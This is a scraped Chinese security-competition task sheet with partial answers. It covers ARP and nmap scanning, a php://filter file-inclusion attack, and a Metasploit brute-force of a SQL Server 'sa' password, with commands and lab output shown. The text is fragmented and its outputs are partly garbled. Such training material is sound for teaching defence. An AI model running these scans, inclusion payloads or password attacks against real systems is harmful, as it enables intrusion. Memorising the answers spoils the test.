1、第二阶段分组对抗系统加固11:30渗透测试15-12:三、竞赛任务书内容(一)拓扑图(二)第一阶段任务书任务1.ARP扫描渗透测试任务环境说明: 服务器场景:CentOS5.5 服务器场景操作系统:1. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为Flag提交;Arping c 5 x.x.x.x2. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字
2、作为Flag提交;rootkali:# arping -c 5 192.168.28.122ARPING 192.168.28.122 from 192.168.28.100 eth0Unicast reply from 192.168.28.122 00:0C:29:62:80:73 1.017ms73 0.638ms73 1.051ms73 1.590msSent 5 probes (1 broadcast(s)Received 5 response(s)Flag:53. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_s
3、weep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/字符串n)提交; msf use auxiliary/scanner/discovery/arp_sweepAuxiliary/scanner/discovery/arp_sweep 4. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提
4、交;msf msf auxiliary(arp_sweep) run* 192.168.28.122 appears to be up (VMware, Inc.).* 192.168.28.2 appears to be up (VMware, Inc.).* Scanned 1 of 1 hosts (100% complete)* Auxiliary module execution completedcompleted5. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS
5、5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;appears6. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;exploit or run任务2.操作系统及应用程序扫描渗透测试1. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap,使用参数n,使用
6、必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;Nmap n Sp x.x.x.x2. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap),并将该操作显示结果的上数第3行左数第3个单词作为Flag提交;# nmap -n -sP 192.168.28.122Starting Nmap 7.40 ( https:/nmap.org ) at 2017-12-10 19:59 ESTNmap scan report for 192.168.28.122Host is up (0.00069s latency).Nmap do
7、ne: 1 IP address (1 host up) scanned in 0.09 secondsup3. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;# nmap -n -A 192.168.28.122/nmap.org ) at 2017-12-10 20:11 ESTHost is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tc
8、p open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey: | 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA)|_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:45:c4:c1:cd (RSA)111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpc
9、bind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.30Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 ms 192.168.28.122OS and Service detection perf
10、ormed. Please report any incorrect results at https:/nmap.org/submit/ . 1 IP address (1 host up) scanned in 8.22 secondsNmap n A x.x.x.x4. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作显示结果的最后1行最后1个单词作为Flag提交;seconds5. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试(使用工具nmap,使用必须要使用
11、的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;# nmap -O 192.168.28.12213 ESTHost is up (0.00044s latency).PORT STATE SERVICE22/tcp open ssh111/tcp open rpcbindOS detection performed. Please report any incorrect results at https: 1 IP address (1 host up) scanned in 14.80 secondsNmap O x.x.x.x6. 通过通过PC2中渗透测试平台对服务器场
12、景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;Nmap sV x.x.x.x7. 通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作显示结果的SSH服务版本信息字符串作为Flag提交;# nmap -sV 192.168.28.12217 ESTHost is up (0.00014s latency).Service detection performed. Please report any i
13、ncorrect results at https: 1 IP address (1 host up) scanned in 19.60 secondsOpenSSH 4.3任务3.Web应用程序文件包含安全攻防 服务器场景名称:WebServ2003 服务器场景安全操作系统:Microsoft Windows2003 Server 服务器场景安装中间件:Apache2.2; 服务器场景安装Web开发环境:Php6; 服务器场景安装数据库:Microsoft SqlServer2000; 服务器场景安装文本编辑器:EditPlus;1. 访问WebServ2003服务器场景,/-Display
14、 Uploadeds File Content,分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交;2. 对该任务题目1页面注入点进行渗透测试,通过php:/filter协议使当前页面以Base64编码方式回显WebServ2003服务器场景访问日志文件:AppServ/Apache2.2/logs/flag.log的内容,并将注入语句作为Flag提交;3. 对该任务题目2页面注入点进行注入以后,将当前页面以Base64编码方式回显内容作为Flag提交;4. 通过PHP函数对题目3中Base64编码回显内容进行解码,并将解码内容作为Flag提交;5.
15、 进入WebServ2003服务器场景的目录,找到DisplayFileCtrl.php文件,使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值,使之可以抵御文件包含渗透测试,并提交Flag(形式:F1|F2|F3|F4);6. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效,并将回显页面源文件内容作为Flag提交;任务4.数据库安全加固1. 对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft SqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Fl
16、ag提交;2. 对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft SqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstatan命令,将回显的数据库服务连接状态作为Flag提交;C:Documents and SettingsAdministratornetstat -anActive Connections Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING445 0.0.0.0:1025 0.0.0.0:1433 0.0.0.0:
17、 TCP 192.168.28.131:139 0.0.0.0: UDP 0.0.0.0:445 *:*500 *:1434 *:4500 *: UDP 127.0.0.1:123 *: UDP 192.168.28.131:137 *:138 *:LISTENING3. 通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交; use auxiliary/scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) * 192.168.28.131: - SQL Server informat
18、ion for 192.168.28.131:+ 192.168.28.131: - ServerName = SERVER - InstanceName = MSSQLSERVER - IsClustered = No - Version = 8.00.194 - tcp = 1433 - np = SERVERpipesqlquery4. 通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果中的最后一个字符串作为Flag提交; use auxiliary/scanne
19、r/mssql/mssql_loginmsf auxiliary(mssql_login) set username sa set pass_file /usr/share/wordlists/metasploit/password.lst msf auxiliary(mssql_login) 1433 - 192.168.28.131:1433 - MSSQL - Starting authentication scanner.! 192.168.28.131:1433 - No active DB - Credential data will not be saved!- 192.168.28.131:1433 - LOGIN FAILED: WORKSTATIONsa:!#$% (Incorrect: )#$% (Incorrect:#$%& (Incorrect:* (Incorrect:boerbul (Incorrect:boerseun (Incorrect:- 192.168.28.
copyright@ 2008-2022 冰豆网网站版权所有
经营许可证编号:鄂ICP备2022015515号-1